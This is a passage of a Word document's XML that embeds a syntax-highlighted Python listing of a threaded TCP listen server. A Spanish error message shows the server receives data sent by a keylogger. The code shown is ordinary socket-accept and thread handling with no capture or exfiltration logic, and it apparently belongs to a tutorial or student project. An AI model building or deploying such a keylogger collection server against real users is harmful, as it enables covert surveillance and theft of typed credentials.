        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>ENCODING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">98   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">99   </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>conn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>close</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">100  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">101  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">102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103  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Create socket and bind to local host and port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">104  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">105  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>_server_socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">socket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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">106  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>_server_socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>setsockopt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>SOL_SOCKET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>SO_REUSEADDR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s61"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">107  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>_server_socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>bind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>((</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>_host_bind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>_server_port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">108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09  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'ListenServer, Creating Socket Except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10  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">111  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">112  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Start listening on socket</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">113  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>_server_socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>settimeout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>SERVER_ACCEPT_TIMEOUT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">114  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>_server_socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>listen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>_max_clients</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">115  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">_server_running </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>= True</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">116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t xml:space="preserve">117  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">118  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>conn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>, (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">)) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>_server_socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>accept</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">()   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Wait to accept a connection - NO blocking call</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">119  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">except </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>timeout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">120  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">pass  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># ignore timeout, next accept</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">121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22  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'Se ha dejado de recibir datos del Keylogger. Excepc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23  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">break                                               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Possibly closed server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">124  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>else:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">125  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">clients_processed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">+= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s61"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">126  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">127  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">client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client_thread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">128  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                                              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</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129  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">130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31  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'ListenServer, Client Listen Error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32  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">133  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Wait to finish threads (Is it necessary? I'm not sure)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">134  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">client </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>client_thread_list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">135  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>join</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
